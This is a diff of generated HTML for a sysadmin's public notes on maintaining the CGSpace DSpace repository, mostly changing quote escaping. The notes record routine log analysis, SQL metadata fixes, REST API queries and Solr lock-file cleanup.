<li>I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate</li>
<li>I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from <a href="https://hdl.handle.net/10568/96140">10568/96140</a> almost 200 times:</li>
</ul>
<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c &#39;acgg_progress_report.pdf&#39;
185
</code></pre><ul>
<li>Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:</li>
</ul>
<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c &#39;acgg_progress_report.pdf&#39;
346
</code></pre><ul>
<li>In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v &#39;upstream response is buffered&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 139.162.146.60
1 157.55.39.159
1 196.188.127.94
@ -1042,9 +1042,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I told him that they should probably try to use the REST API&rsquo;s <code>find-by-metadata-field</code> endpoint</li>
<li>The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;&quot;}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: null}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;&#34;}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: null}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>This returns six items for me, which is the <a href="https://cgspace.cgiar.org/discover?filtertype_1=orcid&amp;filter_relational_operator_1=contains&amp;filter_1=Alan+S.+Orth%3A+0000-0002-1735-7458&amp;submit_apply_filter=&amp;query=">same I see in a Discovery search</a></li>
<li>Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
@ -1075,7 +1075,7 @@ $ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subje
</ul>
<pre tabindex="0"><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
$ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&quot;&quot; --unchanged-line-format=&quot;&quot; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&#34;&#34; --unchanged-line-format=&#34;&#34; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
</code></pre><ul>
<li>Generate a list of countries and regions from CGSpace for Sisay to look through:</li>
</ul>
@ -1129,15 +1129,15 @@ import re
import urllib
import urllib2
pattern = re.compile('^S[A-Z ]+$')
pattern = re.compile(&#39;^S[A-Z ]+$&#39;)
if pattern.match(value):
url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&amp;lang=en'
url = &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=&#39; + urllib.quote_plus(value) + &#39;&amp;lang=en&#39;
get = urllib2.urlopen(url)
data = json.load(get)
if len(data['results']) == 1:
return &quot;matched&quot;
if len(data[&#39;results&#39;]) == 1:
return &#34;matched&#34;
return &quot;unmatched&quot;
return &#34;unmatched&#34;
</code></pre><ul>
<li>You have to make sure to URL encode the value with <code>quote_plus()</code> and it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet so that makes it basically unusable</li>
<li>There is a <a href="https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-2-url-queries-and-parsing-json">good resource discussing OpenRefine, Jython, and web scraping</a></li>
@ -1148,16 +1148,16 @@ return &quot;unmatched&quot;
<li>I&rsquo;m not sure how to deal with terms like &ldquo;CORN&rdquo; that are alternative labels (<code>altLabel</code>) in AGROVOC where the preferred label (<code>prefLabel</code>) would be &ldquo;MAIZE&rdquo;</li>
<li>For example, <a href="http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=CORN*&amp;lang=en">a query</a> for <code>CORN*</code> returns:</li>
</ul>
<pre tabindex="0"><code> &quot;results&quot;: [
<pre tabindex="0"><code> &#34;results&#34;: [
{
&quot;altLabel&quot;: &quot;corn (maize)&quot;,
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;maize&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;altLabel&#34;: &#34;corn (maize)&#34;,
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;maize&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_12332&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_12332&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
},
</code></pre><ul>
<li>There are dozens of other entries like &ldquo;corn (soft wheat)&rdquo;, &ldquo;corn (zea)&rdquo;, &ldquo;corn bran&rdquo;, &ldquo;Cornales&rdquo;, etc that could potentially match and to determine if they are related programatically is difficult</li>
@ -1239,12 +1239,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2015&#39;: Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
</code></pre><ul>
<li>I tried to shutdown Tomcat and remove the locks:</li>
</ul>
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr -iname &quot;*.lock&quot; -delete
# find /home/cgspace.cgiar.org/solr -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>&hellip; but the problem still occurs</li>

View File

@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo
I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -217,7 +217,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
</ul>
</li>
</ul>
<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c &#39;Multiple update components target the same field:solr_update_time_stamp&#39;
1076
</code></pre><ul>
<li>I restarted Tomcat and it&rsquo;s OK now&hellip;</li>
@ -238,13 +238,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
<li>The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms</li>
<li>I see 46 occurrences of these with this query:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE &#39;%http://feedburner.%&#39; OR text_value LIKE &#39;%http://feeds.feedburner.%&#39;);
</code></pre><ul>
<li>I can replace these globally using the following SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https//feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feedburner.&#39;,&#39;https//feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feedburner.%&#39;;
UPDATE 43
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https//feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feeds.feedburner.&#39;,&#39;https//feeds.feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feeds.feedburner.%&#39;;
UPDATE 44
</code></pre><ul>
<li>I ran the corrections on CGSpace and DSpace Test</li>
@ -254,7 +254,7 @@ UPDATE 44
<li>Working on tagging IITA&rsquo;s items with their new research theme (<code>cg.identifier.iitatheme</code>) based on their existing IITA subjects (see <a href="/cgspace-notes/2018-02/">notes from 2019-02</a>)</li>
<li>I exported the entire IITA community from CGSpace and then used <code>csvcut</code> to extract only the needed fields:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]&#39; ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>
<p>After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a <code>||</code>)</p>
@ -263,7 +263,7 @@ UPDATE 44
<p>I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:</p>
</li>
</ul>
<pre tabindex="0"><code>if(isBlank(value), 'PLANT PRODUCTION &amp; HEALTH', value + '||PLANT PRODUCTION &amp; HEALTH')
<pre tabindex="0"><code>if(isBlank(value), &#39;PLANT PRODUCTION &amp; HEALTH&#39;, value + &#39;||PLANT PRODUCTION &amp; HEALTH&#39;)
</code></pre><ul>
<li>Then it&rsquo;s more annoying because there are four IITA subject columns&hellip;</li>
<li>In total this would add research themes to 1,755 items</li>
@ -288,11 +288,11 @@ UPDATE 44
</li>
<li>This is a bit ugly, but it works (using the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL helper function</a> to resolve ID to handle):</li>
</ul>
<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'&quot; | grep -oE '[0-9]{3,}'); do
<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE &#39;%SWAZILAND%&#39;&#34; | grep -oE &#39;[0-9]{3,}&#39;); do
echo &quot;Getting handle for id: ${id}&quot;
echo &#34;Getting handle for id: ${id}&#34;
handle=$(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT ds5_item2itemhandle($id)&quot; | grep -oE '[0-9]{5}/[0-9]+')
handle=$(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT ds5_item2itemhandle($id)&#34; | grep -oE &#39;[0-9]{5}/[0-9]+&#39;)
~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
@ -300,7 +300,7 @@ done
</code></pre><ul>
<li>Then I couldn&rsquo;t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:</li>
</ul>
<pre tabindex="0"><code>$ grep -oE '201[89]' /tmp/*.csv | sort -u
<pre tabindex="0"><code>$ grep -oE &#39;201[89]&#39; /tmp/*.csv | sort -u
/tmp/94834.csv:2018
/tmp/95615.csv:2018
/tmp/96747.csv:2018
@ -326,7 +326,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
</code></pre><ul>
<li>Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, <del>but spikes of over 1,000 today</del>, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently</li>
</ul>
<pre tabindex="0"><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-0* | awk -F: &#39;{print $1}&#39; | sort | uniq -c | tail -n 25
5 dspace.log.2019-02-27
11 dspace.log.2019-02-28
29 dspace.log.2019-03-01
@ -356,7 +356,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
<li>(Update on 2019-03-23 to use correct grep query)</li>
<li>There are not too many connections currently in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
10 dspaceCli
15 dspaceWeb
@ -437,13 +437,13 @@ java.util.EmptyStackException
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(164496) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(164496) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);&#39;
UPDATE 1
</code></pre><h2 id="2019-03-18">2019-03-18</h2>
<ul>
@ -474,7 +474,7 @@ $ wc -l 2019-03-18-subjects-unmatched.txt
<li>Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (<a href="https://github.com/ilri/DSpace/pull/416">#416</a>)</li>
<li>We are getting the blank page issue on CGSpace again today and I see a <del>large number</del> of the &ldquo;SQL QueryTable Error&rdquo; in the DSpace log again (last time was 2019-03-15):</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
<pre tabindex="0"><code>$ grep -c &#39;SQL QueryTable Error&#39; dspace.log.2019-03-1[5678]
dspace.log.2019-03-15:929
dspace.log.2019-03-16:67
dspace.log.2019-03-17:72
@ -482,9 +482,9 @@ dspace.log.2019-03-18:1038
</code></pre><ul>
<li>Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the &ldquo;binary file matches&rdquo; result with <code>-I</code>:</li>
</ul>
<pre tabindex="0"><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-18 | wc -l
8
$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: &#39;{print $1}&#39; | sort | uniq -c
9 dspace.log.2019-03-08
25 dspace.log.2019-03-14
12 dspace.log.2019-03-15
@ -504,22 +504,22 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is c
</code></pre><ul>
<li>There is a low number of connections to PostgreSQL currently:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
33
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
7 dspaceCli
15 dspaceWeb
</code></pre><ul>
<li>I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:</li>
</ul>
<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &quot;waiting&quot; does not exist at character 217
<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &#34;waiting&#34; does not exist at character 217
</code></pre><ul>
<li>This is unrelated and apparently due to <a href="https://github.com/munin-monitoring/munin/issues/746">Munin checking a column that was changed in PostgreSQL 9.6</a></li>
<li>I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it&rsquo;s a Cocoon thing?</li>
<li>Looking in the cocoon logs I see a large number of warnings about &ldquo;Can not load requested doc&rdquo; around 11AM and 12PM:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-18 | grep -oE &#39;2019-03-18 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-18 00:
6 2019-03-18 02:
3 2019-03-18 04:
@ -535,7 +535,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And a few days ago on 2019-03-15 when I happened last it was in the afternoon when it happened and the same pattern occurs then around 12PM:</li>
</ul>
<pre tabindex="0"><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-15.xz | grep -oE &#39;2019-03-15 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-15 01:
3 2019-03-15 02:
1 2019-03-15 03:
@ -561,7 +561,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And again on 2019-03-08, surprise surprise, it happened in the morning:</li>
</ul>
<pre tabindex="0"><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-08.xz | grep -oE &#39;2019-03-08 [0-9]{2}:&#39; | sort | uniq -c
11 2019-03-08 01:
3 2019-03-08 02:
1 2019-03-08 03:
@ -581,7 +581,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
<li>I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for a pretty confusing debugging&hellip;</li>
<li>I will replace these in the database immediately to save myself the headache later:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ &#39;.+\u00a0.+&#39;;
count
-------
84
@ -630,7 +630,7 @@ Max realtime timeout unlimited unlimited us
<li>For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:</li>
</ul>
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr/ -iname &quot;*.lock&quot; -delete
# find /home/cgspace.cgiar.org/solr/ -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>After restarting I confirmed that all Solr statistics cores were loaded successfully&hellip;</li>
@ -660,10 +660,10 @@ Max realtime timeout unlimited unlimited us
<ul>
<li>It&rsquo;s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-20 | grep -oE &#39;2019-03-20 [0-9]{2}:&#39; | sort | uniq -c
3 2019-03-20 00:
12 2019-03-20 02:
$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-21 | grep -oE &#39;2019-03-21 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-21 00:
1 2019-03-21 02:
4 2019-03-21 03:
@ -704,7 +704,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
<ul>
<li>CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-22 00:
69 2019-03-22 01:
1 2019-03-22 02:
@ -727,7 +727,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
323 2019-03-22 21:
685 2019-03-22 22:
357 2019-03-22 23:
$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-23 | grep -oE &#39;2019-03-23 [0-9]{2}:&#39; | sort | uniq -c
575 2019-03-23 00:
445 2019-03-23 01:
518 2019-03-23 02:
@ -742,7 +742,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
<li>I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn&rsquo;t</li>
<li>Trying to drill down more, I see that the bulk of the errors started aroundi 21:20:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 21:[0-9]&#39; | sort | uniq -c
1 2019-03-22 21:0
1 2019-03-22 21:1
59 2019-03-22 21:2
@ -850,12 +850,12 @@ org.postgresql.util.PSQLException: This statement has been closed.
<ul>
<li>Could be an error in the docs, as I see the <a href="https://commons.apache.org/proper/commons-dbcp/configuration.html">Apache Commons DBCP</a> has -1 as the default</li>
<li>Maybe I need to re-evaluate the &ldquo;defauts&rdquo; of Tomcat 7&rsquo;s DBCP and set them explicitly in our config</li>
<li>From Tomcat 8 they seem to default to Apache Commons' DBCP 2.x</li>
<li>From Tomcat 8 they seem to default to Apache Commons&rsquo; DBCP 2.x</li>
</ul>
</li>
<li>Also, CGSpace doesn&rsquo;t have many Cocoon errors yet this morning:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-25 | grep -oE &#39;2019-03-25 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-25 00:
1 2019-03-25 01:
</code></pre><ul>
@ -869,7 +869,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
<li>Uptime Robot reported that CGSpace went down and I see the load is very high</li>
<li>The top IPs around the time in the nginx API and web logs were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
9 190.252.43.162
12 157.55.39.140
18 157.55.39.54
@ -880,7 +880,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
36 157.55.39.9
50 52.23.239.229
2380 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
354 18.195.78.144
363 190.216.179.100
386 40.77.167.185
@ -898,23 +898,23 @@ org.postgresql.util.PSQLException: This statement has been closed.
</code></pre><ul>
<li>Surprisingly they are re-using their Tomcat session:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74&#39; dspace.log.2019-03-25 | sort | uniq | wc -l
1
</code></pre><ul>
<li>That&rsquo;s weird because the total number of sessions today seems low compared to recent days:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-25 | sort -u | wc -l
5657
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-24 | sort -u | wc -l
17710
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-23 | sort -u | wc -l
17179
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
